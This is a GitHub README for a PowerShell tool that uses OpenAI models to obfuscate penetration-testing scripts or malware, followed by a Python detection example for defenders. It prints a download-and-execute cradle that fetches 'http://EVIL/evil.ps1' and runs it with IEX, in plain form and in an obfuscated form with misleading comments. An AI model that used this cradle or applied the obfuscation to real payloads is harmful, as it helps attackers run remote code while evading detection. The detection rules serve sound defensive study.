PowerShell implementation of a novel technique. Invoke-GPTObfuscation is a PowerShell Obfuscator that utilizes OpenAI (and other APIs) to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script.

hwvs/Invoke-GPTObfuscation

Invoke-GPTObfuscation

Invoke-GPTObfuscation is a PowerShell Obfuscator that utilizes OpenAI or compatible text-completion models to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script. This code is intended for Educational & Research purposes only.

This is mostly a demonstration and will frequently produce invalid code. You'll need to come up with a better prompt to get good results. If you make any improvements, please consider submitting a pull request!

With better prompt templates, or better models (GPT-4), this tool can achieve much more impressive results. I've found GPT-4 can perform impressive code mutations that completely change the structure of the code.

(TODO) Future Improvements:

  • Convert variable names to placeholder-symbols via Regex to maintain across code (eg: $, $)
  • Validate syntax, optionally re-generate if there is a syntax error
  • Instead of building blocks line-by-line, try to build blocks by { context }
  • Add in options into the prompt that the model can try to replicate
  • Add support for other providers/API (Anthropic/Claude?)

Credits

Author: Hunter Watson

License: Mozilla Public License 2.0


Usage

Run the CLI tool (in a PowerShell window): ./Invoke-GPTObfuscation.ps1

Use the module in your code

# load the module however is easiest for you, eg:
$module_path = $pwd.Path + "/Invoke-GPTObfuscation.psm1"
Invoke-Expression (Get-Content $module_path -Raw)
  
#...

$script_obfuscated = Invoke-GPTObfuscation -ScriptBlock $script -PromptTemplateFile $prompt_template_path -Verbose $true

Results

Before:

$ie=New-Object -comobject InternetExplorer.Application;
$ie.visible=$False;
$ie.navigate('http://EVIL/evil.ps1');
start-sleep -s 5;
$r=$ie.Document.body.innerHTML;
$ie.quit();
IEX $r

After:

# generating Log files
$Strawberry = New-Object -CoMObjEcT inTErnETeXPLOreR.Application;
$strawberry.vISiblE = $fAlSe;
$STRaWbeRRy.NAVigatE('HttP://evIl/evil.ps1');
stArT-SlEEp -s 5;

# Updating log directory path
$r = $StrawberrY.DoCument.BoDy.InneRHTML;

# Cleanup
$strawBerRy.quiT();

# Execute payload
IeX $R

(Note: This result was cherry-picked)
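
For defenders reviewing logged script text, the following added example (not part of this project's code) runs the "Before" and "After" scripts above through case-insensitive behavioural rules and a check for variables spelled with inconsistent casing. The rule names and helper functions are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed input: the README's "Before" and "After" scripts (blank lines dropped).
BEFORE = """$ie=New-Object -comobject InternetExplorer.Application;
$ie.visible=$False;
$ie.navigate('http://EVIL/evil.ps1');
start-sleep -s 5;
$r=$ie.Document.body.innerHTML;
$ie.quit();
IEX $r"""

AFTER = """# generating Log files
$Strawberry = New-Object -CoMObjEcT inTErnETeXPLOreR.Application;
$strawberry.vISiblE = $fAlSe;
$STRaWbeRRy.NAVigatE('HttP://evIl/evil.ps1');
stArT-SlEEp -s 5;
# Updating log directory path
$r = $StrawberrY.DoCument.BoDy.InneRHTML;
# Cleanup
$strawBerRy.quiT();
# Execute payload
IeX $R"""

# Behavioural rules (hypothetical names). PowerShell is case-insensitive,
# so every pattern is compiled with IGNORECASE.
RULES = {
    "ie_com_object": re.compile(r"new-object\s+-comobject\s+internetexplorer\.application", re.I),
    "com_navigate": re.compile(r"\.navigate\s*\(", re.I),
    "invoke_expression": re.compile(r"(?<![\w-])(?:iex|invoke-expression)(?![\w-])", re.I),
}

def strip_comments(script):
    # Naive: drops whole-line '#' comments only, which is enough for these samples.
    return "\n".join(l for l in script.splitlines() if not l.lstrip().startswith("#"))

def matched_rules(script):
    code = strip_comments(script)
    return {name for name, rx in RULES.items() if rx.search(code)}

def inconsistent_variables(script):
    """Map lower-cased variable name -> spellings, for variables spelled more than one way."""
    seen = defaultdict(set)
    for name in re.findall(r"\$(\w+)", strip_comments(script)):
        seen[name.lower()].add(name)
    return {k: v for k, v in seen.items() if len(v) > 1}
```

Both samples match the same three rules, and only the "After" sample reports variables with more than one spelling, so the case randomization adds a signal rather than removing one.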
